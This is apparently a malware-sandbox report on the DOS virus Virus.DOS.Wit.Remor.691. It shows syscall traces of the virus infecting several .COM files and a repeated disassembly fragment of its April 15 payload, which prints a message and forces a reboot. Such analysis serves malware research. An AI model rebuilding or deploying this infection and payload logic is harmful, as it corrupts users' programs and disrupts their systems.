Sample viewer

vx.netlux.org/Virus.DOS.Wit.Remor.691

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T21:55:49.635109194Z 26 PC: 12a9f | Set disk transfer address
2018-12-17T21:55:49.63662287Z 71 PC: 12ab1 | Get current directory
2018-12-17T21:55:49.640000802Z 42 PC: 12ab7 | Get date 0x12ab7: cmp dh, 4
0x12aba: jne 0x12ad5
0x12abc: cmp dl, 0xf
0x12abf: jne 0x12ad5
0x12ac1: mov ax, 0x1010
0x12ac4: out 0x70, ax
0x12ac6: mov dx, 0x346
0x12ac9: mov ah, 9
0x12acb: int 0x21
0x12acd: mov ah, 8
0x12acf: int 0x21
0x12ad1: mov al, 0xfe
0x12ad3: out 0x64, al
0x12ad5: mov ah, byte ptr [0x375]
0x12ad9: mov cl, 7
0x12adb: mov dx, 0x33a
0x12ade: int 0x21
0x12ae0: jae 0x12ae5
0x12ae2: jmp 0x12c1f
0x12ae5: mov dx, word ptr [0x369]
2018-12-17T21:55:49.642461729Z 78 PC: 12ae0 | Find first file
2018-12-17T21:55:49.649067848Z 67 PC: 12afc | Get or set file attributes
2018-12-17T21:55:49.66450477Z 61 PC: 12b10 | Open file (Filename = 'SLEEP.COM')
2018-12-17T21:55:49.670960632Z 63 PC: 12b2c | Read file or device (Read 688 bytes on handle 5)
2018-12-17T21:55:49.678637988Z 66 PC: 12b4b | Move file pointer
2018-12-17T21:55:49.680076817Z 66 PC: 12b6e | Move file pointer
2018-12-17T21:55:49.681548285Z 64 PC: 12b89 | Write file or device (Write 407 bytes on handle 5)
2018-12-17T21:55:49.689968033Z 64 PC: 12b99 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T21:55:49.692839121Z 66 PC: 12bc8 | Move file pointer
2018-12-17T21:55:49.694168272Z 64 PC: 12bd9 | Write file or device (Write 688 bytes on handle 5)
2018-12-17T21:55:49.703253196Z 87 PC: 12bea | Get or set file date and time
2018-12-17T21:55:49.704825472Z 62 PC: 12bf0 | Close file
2018-12-17T21:55:49.713715853Z 67 PC: 12c02 | Get or set file attributes
2018-12-17T21:55:49.724151901Z 79 PC: 12ae0 | Find next file
2018-12-17T21:55:49.727260948Z 67 PC: 12afc | Get or set file attributes
2018-12-17T21:55:49.736959926Z 61 PC: 12b10 | Open file (Filename = 'PRINT.COM')
2018-12-17T21:55:49.753254528Z 63 PC: 12b2c | Read file or device (Read 688 bytes on handle 5)
2018-12-17T21:55:49.759875056Z 66 PC: 12b4b | Move file pointer
2018-12-17T21:55:49.76123381Z 66 PC: 12b6e | Move file pointer
2018-12-17T21:55:49.762596813Z 64 PC: 12b89 | Write file or device (Write 27 bytes on handle 5)
2018-12-17T21:55:49.768263724Z 64 PC: 12b99 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T21:55:49.771454626Z 66 PC: 12bc8 | Move file pointer
2018-12-17T21:55:49.772722939Z 64 PC: 12bd9 | Write file or device (Write 688 bytes on handle 5)
2018-12-17T21:55:49.78206145Z 87 PC: 12bea | Get or set file date and time
2018-12-17T21:55:49.783442409Z 62 PC: 12bf0 | Close file
2018-12-17T21:55:49.791366342Z 67 PC: 12c02 | Get or set file attributes
2018-12-17T21:55:49.802875514Z 79 PC: 12ae0 | Find next file
2018-12-17T21:55:49.805506557Z 67 PC: 12afc | Get or set file attributes
2018-12-17T21:55:49.814711559Z 61 PC: 12b10 | Open file (Filename = 'HELLO.COM')
2018-12-17T21:55:49.82145246Z 63 PC: 12b2c | Read file or device (Read 688 bytes on handle 5)
2018-12-17T21:55:49.827557398Z 66 PC: 12b4b | Move file pointer
2018-12-17T21:55:49.829413308Z 66 PC: 12b6e | Move file pointer
2018-12-17T21:55:49.831529401Z 64 PC: 12b89 | Write file or device (Write 92 bytes on handle 5)
2018-12-17T21:55:49.835335154Z 64 PC: 12b99 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T21:55:49.838222411Z 66 PC: 12bc8 | Move file pointer
2018-12-17T21:55:49.840710337Z 64 PC: 12bd9 | Write file or device (Write 688 bytes on handle 5)
2018-12-17T21:55:49.84887231Z 87 PC: 12bea | Get or set file date and time
2018-12-17T21:55:49.850328453Z 62 PC: 12bf0 | Close file
2018-12-17T21:55:49.858166626Z 67 PC: 12c02 | Get or set file attributes
2018-12-17T21:55:49.868702Z 79 PC: 12ae0 | Find next file
2018-12-17T21:55:49.871306029Z 67 PC: 12afc | Get or set file attributes
2018-12-17T21:55:49.87755207Z 61 PC: 12b10 | Open file (Filename = 'PHANG.COM')
2018-12-17T21:55:49.882412506Z 63 PC: 12b2c | Read file or device (Read 688 bytes on handle 5)
2018-12-17T21:55:49.888092372Z 66 PC: 12b4b | Move file pointer
2018-12-17T21:55:49.889460858Z 66 PC: 12b6e | Move file pointer
2018-12-17T21:55:49.891659859Z 64 PC: 12b89 | Write file or device (Write 29 bytes on handle 5)
2018-12-17T21:55:49.895370357Z 64 PC: 12b99 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T21:55:49.898233433Z 66 PC: 12bc8 | Move file pointer
2018-12-17T21:55:49.900186162Z 64 PC: 12bd9 | Write file or device (Write 688 bytes on handle 5)
2018-12-17T21:55:49.908023924Z 87 PC: 12bea | Get or set file date and time
2018-12-17T21:55:49.90943499Z 62 PC: 12bf0 | Close file
2018-12-17T21:55:49.917899112Z 67 PC: 12c02 | Get or set file attributes
2018-12-17T21:55:49.92771432Z 79 PC: 12ae0 | Find next file
2018-12-17T21:55:49.930197636Z 67 PC: 12afc | Get or set file attributes
2018-12-17T21:55:49.940372024Z 61 PC: 12b10 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T21:55:49.946810206Z 63 PC: 12b2c | Read file or device (Read 688 bytes on handle 5)
2018-12-17T21:55:49.952833756Z 66 PC: 12b4b | Move file pointer
2018-12-17T21:55:49.954826342Z 66 PC: 12b6e | Move file pointer
2018-12-17T21:55:49.956991729Z 64 PC: 12b89 | Write file or device (Write 29 bytes on handle 5)
2018-12-17T21:55:49.960657091Z 64 PC: 12b99 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T21:55:49.964153102Z 66 PC: 12bc8 | Move file pointer
2018-12-17T21:55:49.965760162Z 64 PC: 12bd9 | Write file or device (Write 688 bytes on handle 5)
2018-12-17T21:55:49.973654072Z 87 PC: 12bea | Get or set file date and time
2018-12-17T21:55:49.975328638Z 62 PC: 12bf0 | Close file
2018-12-17T21:55:49.98361707Z 67 PC: 12c02 | Get or set file attributes
2018-12-17T21:55:49.992974263Z 59 PC: 12c28 | Change current directory
2018-12-17T21:55:49.996861647Z 26 PC: 12c45 | Set disk transfer address
2018-12-17T21:55:49.998245653Z 59 PC: 12c50 | Change current directory

{"DateBased":true,"Day":15,"Month":4,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":630,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:41:22.984374146Z 26 PC: 12a9f | Set disk transfer address
2018-12-25T11:41:22.985562079Z 71 PC: 12ab1 | Get current directory
2018-12-25T11:41:22.988219012Z 42 PC: 12ab7 | Get date 0x12ab7: cmp dh, 4
0x12aba: jne 0x12ad5
0x12abc: cmp dl, 0xf
0x12abf: jne 0x12ad5
0x12ac1: mov ax, 0x1010
0x12ac4: out 0x70, ax
0x12ac6: mov dx, 0x346
0x12ac9: mov ah, 9
0x12acb: int 0x21
0x12acd: mov ah, 8
0x12acf: int 0x21
0x12ad1: mov al, 0xfe
0x12ad3: out 0x64, al
0x12ad5: mov ah, byte ptr [0x375]
0x12ad9: mov cl, 7
0x12adb: mov dx, 0x33a
0x12ade: int 0x21
0x12ae0: jae 0x12ae5
0x12ae2: jmp 0x12c1f
0x12ae5: mov dx, word ptr [0x369]
2018-12-25T11:41:22.990106495Z 9 PC: 12acd | Display string (String= '��ࠡ���� - rulez forever ! ')
2018-12-25T11:41:22.993964866Z 8 PC: 12ad1 | Console input without echo

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":630,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:41:23.368084321Z 26 PC: 12a9f | Set disk transfer address
2018-12-25T11:41:23.369391996Z 71 PC: 12ab1 | Get current directory
2018-12-25T11:41:23.372088521Z 42 PC: 12ab7 | Get date 0x12ab7: cmp dh, 4
0x12aba: jne 0x12ad5
0x12abc: cmp dl, 0xf
0x12abf: jne 0x12ad5
0x12ac1: mov ax, 0x1010
0x12ac4: out 0x70, ax
0x12ac6: mov dx, 0x346
0x12ac9: mov ah, 9
0x12acb: int 0x21
0x12acd: mov ah, 8
0x12acf: int 0x21
0x12ad1: mov al, 0xfe
0x12ad3: out 0x64, al
0x12ad5: mov ah, byte ptr [0x375]
0x12ad9: mov cl, 7
0x12adb: mov dx, 0x33a
0x12ade: int 0x21
0x12ae0: jae 0x12ae5
0x12ae2: jmp 0x12c1f
0x12ae5: mov dx, word ptr [0x369]
2018-12-25T11:41:23.374003562Z 78 PC: 12ae0 | Find first file
2018-12-25T11:41:23.380229237Z 67 PC: 12afc | Get or set file attributes
2018-12-25T11:41:23.398001106Z 61 PC: 12b10 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:41:23.404383573Z 63 PC: 12b2c | Read file or device (Read 688 bytes on handle 5)
2018-12-25T11:41:23.426504869Z 66 PC: 12b4b | Move file pointer
2018-12-25T11:41:23.427988092Z 66 PC: 12b6e | Move file pointer
2018-12-25T11:41:23.429483361Z 64 PC: 12b89 | Write file or device (Write 407 bytes on handle 5)
2018-12-25T11:41:23.437856912Z 64 PC: 12b99 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:41:23.440666628Z 66 PC: 12bc8 | Move file pointer
2018-12-25T11:41:23.441918227Z 64 PC: 12bd9 | Write file or device (Write 688 bytes on handle 5)
2018-12-25T11:41:23.450314867Z 87 PC: 12bea | Get or set file date and time
2018-12-25T11:41:23.451853144Z 62 PC: 12bf0 | Close file
2018-12-25T11:41:23.459131237Z 67 PC: 12c02 | Get or set file attributes
2018-12-25T11:41:23.468738628Z 79 PC: 12ae0 | Find next file (See above)
2018-12-25T11:41:23.471716549Z 67 PC: 12afc | Get or set file attributes (See above)
2018-12-25T11:41:23.481090551Z 61 PC: 12b10 | Open file (See above)
2018-12-25T11:41:23.487451868Z 63 PC: 12b2c | Read file or device (See above)
2018-12-25T11:41:23.493841987Z 66 PC: 12b4b | Move file pointer (See above)
2018-12-25T11:41:23.495194031Z 66 PC: 12b6e | Move file pointer (See above)
2018-12-25T11:41:23.496536163Z 64 PC: 12b89 | Write file or device (See above)
2018-12-25T11:41:23.50106825Z 64 PC: 12b99 | Write file or device (See above)
2018-12-25T11:41:23.50404096Z 66 PC: 12bc8 | Move file pointer (See above)
2018-12-25T11:41:23.505444544Z 64 PC: 12bd9 | Write file or device (See above)
2018-12-25T11:41:23.513875102Z 87 PC: 12bea | Get or set file date and time (See above)
2018-12-25T11:41:23.515197671Z 62 PC: 12bf0 | Close file (See above)
2018-12-25T11:41:23.522600178Z 67 PC: 12c02 | Get or set file attributes (See above)
2018-12-25T11:41:23.532350572Z 79 PC: 12ae0 | Find next file (See above)
2018-12-25T11:41:23.534924062Z 67 PC: 12afc | Get or set file attributes (See above)
2018-12-25T11:41:23.544227456Z 61 PC: 12b10 | Open file (See above)
2018-12-25T11:41:23.551354797Z 63 PC: 12b2c | Read file or device (See above)
2018-12-25T11:41:23.557551919Z 66 PC: 12b4b | Move file pointer (See above)
2018-12-25T11:41:23.558880034Z 66 PC: 12b6e | Move file pointer (See above)
2018-12-25T11:41:23.560794761Z 64 PC: 12b89 | Write file or device (See above)
2018-12-25T11:41:23.564425061Z 64 PC: 12b99 | Write file or device (See above)
2018-12-25T11:41:23.567183185Z 66 PC: 12bc8 | Move file pointer (See above)
2018-12-25T11:41:23.569020175Z 64 PC: 12bd9 | Write file or device (See above)
2018-12-25T11:41:23.577179278Z 87 PC: 12bea | Get or set file date and time (See above)
2018-12-25T11:41:23.578529543Z 62 PC: 12bf0 | Close file (See above)
2018-12-25T11:41:23.586274572Z 67 PC: 12c02 | Get or set file attributes (See above)
2018-12-25T11:41:23.595616031Z 79 PC: 12ae0 | Find next file (See above)
2018-12-25T11:41:23.598012216Z 67 PC: 12afc | Get or set file attributes (See above)
2018-12-25T11:41:23.60759657Z 61 PC: 12b10 | Open file (See above)
2018-12-25T11:41:23.613913866Z 63 PC: 12b2c | Read file or device (See above)
2018-12-25T11:41:23.619965145Z 66 PC: 12b4b | Move file pointer (See above)
2018-12-25T11:41:23.621636613Z 66 PC: 12b6e | Move file pointer (See above)
2018-12-25T11:41:23.622867618Z 64 PC: 12b89 | Write file or device (See above)
2018-12-25T11:41:23.626923732Z 64 PC: 12b99 | Write file or device (See above)
2018-12-25T11:41:23.630411912Z 66 PC: 12bc8 | Move file pointer (See above)
2018-12-25T11:41:23.631655744Z 64 PC: 12bd9 | Write file or device (See above)
2018-12-25T11:41:23.63993589Z 87 PC: 12bea | Get or set file date and time (See above)
2018-12-25T11:41:23.641882791Z 62 PC: 12bf0 | Close file (See above)
2018-12-25T11:41:23.64951974Z 67 PC: 12c02 | Get or set file attributes (See above)
2018-12-25T11:41:23.65899941Z 79 PC: 12ae0 | Find next file (See above)
2018-12-25T11:41:23.662029305Z 67 PC: 12afc | Get or set file attributes (See above)
2018-12-25T11:41:23.671617797Z 61 PC: 12b10 | Open file (See above)
2018-12-25T11:41:23.677958071Z 63 PC: 12b2c | Read file or device (See above)
2018-12-25T11:41:23.684576568Z 66 PC: 12b4b | Move file pointer (See above)
2018-12-25T11:41:23.685906919Z 66 PC: 12b6e | Move file pointer (See above)
2018-12-25T11:41:23.687212343Z 64 PC: 12b89 | Write file or device (See above)
2018-12-25T11:41:23.691651701Z 64 PC: 12b99 | Write file or device (See above)
2018-12-25T11:41:23.694396174Z 66 PC: 12bc8 | Move file pointer (See above)
2018-12-25T11:41:23.69562194Z 64 PC: 12bd9 | Write file or device (See above)
2018-12-25T11:41:23.704631745Z 87 PC: 12bea | Get or set file date and time (See above)
2018-12-25T11:41:23.70603755Z 62 PC: 12bf0 | Close file (See above)
2018-12-25T11:41:23.713626407Z 67 PC: 12c02 | Get or set file attributes (See above)
2018-12-25T11:41:23.723807641Z 59 PC: 12c28 | Change current directory
2018-12-25T11:41:23.72806142Z 26 PC: 12c45 | Set disk transfer address
2018-12-25T11:41:23.729157713Z 59 PC: 12c50 | Change current directory

{"DateBased":true,"Day":1,"Month":4,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":630,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:41:23.771825371Z 26 PC: 12a9f | Set disk transfer address
2018-12-25T11:41:23.773630421Z 71 PC: 12ab1 | Get current directory
2018-12-25T11:41:23.77638315Z 42 PC: 12ab7 | Get date 0x12ab7: cmp dh, 4
0x12aba: jne 0x12ad5
0x12abc: cmp dl, 0xf
0x12abf: jne 0x12ad5
0x12ac1: mov ax, 0x1010
0x12ac4: out 0x70, ax
0x12ac6: mov dx, 0x346
0x12ac9: mov ah, 9
0x12acb: int 0x21
0x12acd: mov ah, 8
0x12acf: int 0x21
0x12ad1: mov al, 0xfe
0x12ad3: out 0x64, al
0x12ad5: mov ah, byte ptr [0x375]
0x12ad9: mov cl, 7
0x12adb: mov dx, 0x33a
0x12ade: int 0x21
0x12ae0: jae 0x12ae5
0x12ae2: jmp 0x12c1f
0x12ae5: mov dx, word ptr [0x369]
2018-12-25T11:41:23.778492256Z 78 PC: 12ae0 | Find first file
2018-12-25T11:41:23.785110861Z 67 PC: 12afc | Get or set file attributes
2018-12-25T11:41:23.801385882Z 61 PC: 12b10 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:41:23.807999018Z 63 PC: 12b2c | Read file or device (Read 688 bytes on handle 5)
2018-12-25T11:41:23.814515337Z 66 PC: 12b4b | Move file pointer
2018-12-25T11:41:23.816956898Z 66 PC: 12b6e | Move file pointer
2018-12-25T11:41:23.818771867Z 64 PC: 12b89 | Write file or device (Write 407 bytes on handle 5)
2018-12-25T11:41:23.827376238Z 64 PC: 12b99 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:41:23.831889963Z 66 PC: 12bc8 | Move file pointer
2018-12-25T11:41:23.834087271Z 64 PC: 12bd9 | Write file or device (Write 688 bytes on handle 5)
2018-12-25T11:41:23.842186977Z 87 PC: 12bea | Get or set file date and time
2018-12-25T11:41:23.844636523Z 62 PC: 12bf0 | Close file
2018-12-25T11:41:23.853840868Z 67 PC: 12c02 | Get or set file attributes
2018-12-25T11:41:23.863499746Z 79 PC: 12ae0 | Find next file (See above)
2018-12-25T11:41:23.86653734Z 67 PC: 12afc | Get or set file attributes (See above)
2018-12-25T11:41:23.876173855Z 61 PC: 12b10 | Open file (See above)
2018-12-25T11:41:23.882705266Z 63 PC: 12b2c | Read file or device (See above)
2018-12-25T11:41:23.889851303Z 66 PC: 12b4b | Move file pointer (See above)
2018-12-25T11:41:23.891159466Z 66 PC: 12b6e | Move file pointer (See above)
2018-12-25T11:41:23.892408095Z 64 PC: 12b89 | Write file or device (See above)
2018-12-25T11:41:23.897029787Z 64 PC: 12b99 | Write file or device (See above)
2018-12-25T11:41:23.899839302Z 66 PC: 12bc8 | Move file pointer (See above)
2018-12-25T11:41:23.90153445Z 64 PC: 12bd9 | Write file or device (See above)
2018-12-25T11:41:23.910120794Z 87 PC: 12bea | Get or set file date and time (See above)
2018-12-25T11:41:23.912528003Z 62 PC: 12bf0 | Close file (See above)
2018-12-25T11:41:23.92019934Z 67 PC: 12c02 | Get or set file attributes (See above)
2018-12-25T11:41:23.93014876Z 79 PC: 12ae0 | Find next file (See above)
2018-12-25T11:41:23.9327069Z 67 PC: 12afc | Get or set file attributes (See above)
2018-12-25T11:41:23.942079871Z 61 PC: 12b10 | Open file (See above)
2018-12-25T11:41:23.948856258Z 63 PC: 12b2c | Read file or device (See above)
2018-12-25T11:41:23.955055865Z 66 PC: 12b4b | Move file pointer (See above)
2018-12-25T11:41:23.956386951Z 66 PC: 12b6e | Move file pointer (See above)
2018-12-25T11:41:23.95826642Z 64 PC: 12b89 | Write file or device (See above)
2018-12-25T11:41:23.961999943Z 64 PC: 12b99 | Write file or device (See above)
2018-12-25T11:41:23.964784926Z 66 PC: 12bc8 | Move file pointer (See above)
2018-12-25T11:41:23.966294004Z 64 PC: 12bd9 | Write file or device (See above)
2018-12-25T11:41:23.974429338Z 87 PC: 12bea | Get or set file date and time (See above)
2018-12-25T11:41:23.97650228Z 62 PC: 12bf0 | Close file (See above)
2018-12-25T11:41:23.982894914Z 67 PC: 12c02 | Get or set file attributes (See above)
2018-12-25T11:41:23.989149254Z 79 PC: 12ae0 | Find next file (See above)
2018-12-25T11:41:23.991140493Z 67 PC: 12afc | Get or set file attributes (See above)
2018-12-25T11:41:23.997353779Z 61 PC: 12b10 | Open file (See above)
2018-12-25T11:41:24.004189824Z 63 PC: 12b2c | Read file or device (See above)
2018-12-25T11:41:24.010287975Z 66 PC: 12b4b | Move file pointer (See above)
2018-12-25T11:41:24.011810915Z 66 PC: 12b6e | Move file pointer (See above)
2018-12-25T11:41:24.014002181Z 64 PC: 12b89 | Write file or device (See above)
2018-12-25T11:41:24.017716383Z 64 PC: 12b99 | Write file or device (See above)
2018-12-25T11:41:24.020339114Z 66 PC: 12bc8 | Move file pointer (See above)
2018-12-25T11:41:24.021920635Z 64 PC: 12bd9 | Write file or device (See above)
2018-12-25T11:41:24.029933779Z 87 PC: 12bea | Get or set file date and time (See above)
2018-12-25T11:41:24.031415627Z 62 PC: 12bf0 | Close file (See above)
2018-12-25T11:41:24.038933864Z 67 PC: 12c02 | Get or set file attributes (See above)
2018-12-25T11:41:24.051103408Z 79 PC: 12ae0 | Find next file (See above)
2018-12-25T11:41:24.054050286Z 67 PC: 12afc | Get or set file attributes (See above)
2018-12-25T11:41:24.06437333Z 61 PC: 12b10 | Open file (See above)
2018-12-25T11:41:24.070832312Z 63 PC: 12b2c | Read file or device (See above)
2018-12-25T11:41:24.077042144Z 66 PC: 12b4b | Move file pointer (See above)
2018-12-25T11:41:24.078733444Z 66 PC: 12b6e | Move file pointer (See above)
2018-12-25T11:41:24.080032528Z 64 PC: 12b89 | Write file or device (See above)
2018-12-25T11:41:24.084462274Z 64 PC: 12b99 | Write file or device (See above)
2018-12-25T11:41:24.088526353Z 66 PC: 12bc8 | Move file pointer (See above)
2018-12-25T11:41:24.090305313Z 64 PC: 12bd9 | Write file or device (See above)
2018-12-25T11:41:24.099169871Z 87 PC: 12bea | Get or set file date and time (See above)
2018-12-25T11:41:24.10203786Z 62 PC: 12bf0 | Close file (See above)
2018-12-25T11:41:24.11083094Z 67 PC: 12c02 | Get or set file attributes (See above)
2018-12-25T11:41:24.120801042Z 59 PC: 12c28 | Change current directory
2018-12-25T11:41:24.12618812Z 26 PC: 12c45 | Set disk transfer address
2018-12-25T11:41:24.127594071Z 59 PC: 12c50 | Change current directory